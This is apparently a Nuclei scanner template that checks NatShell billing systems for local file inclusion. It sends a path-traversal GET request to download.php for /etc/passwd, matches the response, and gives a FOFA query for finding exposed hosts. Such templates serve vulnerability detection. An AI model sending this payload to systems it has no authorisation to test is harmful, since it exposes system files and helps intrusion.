35 lines
926 B
YAML
35 lines
926 B
YAML
id: natshell-path-traversal
|
|
|
|
info:
|
|
name: NatShell - Local File Inclusion
|
|
author: pikpikcu
|
|
severity: high
|
|
description: NatShell is vulnerable to local file inclusion.
|
|
reference:
|
|
- https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
max-request: 1
|
|
fofa-query: title="蓝海卓越计费管理系统"
|
|
tags: natshell,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/download.php?file=../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "toor:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a004830460221008929d548dc063badcf3a91c7ce903ebf3aad9f15af44e3b173284d859b2f4973022100e3974fd187484b6506c29a2142e466b691c9f7c36ef95f7eb86c03547071a26b:922c64590222798bb761d5b6d8e72950
|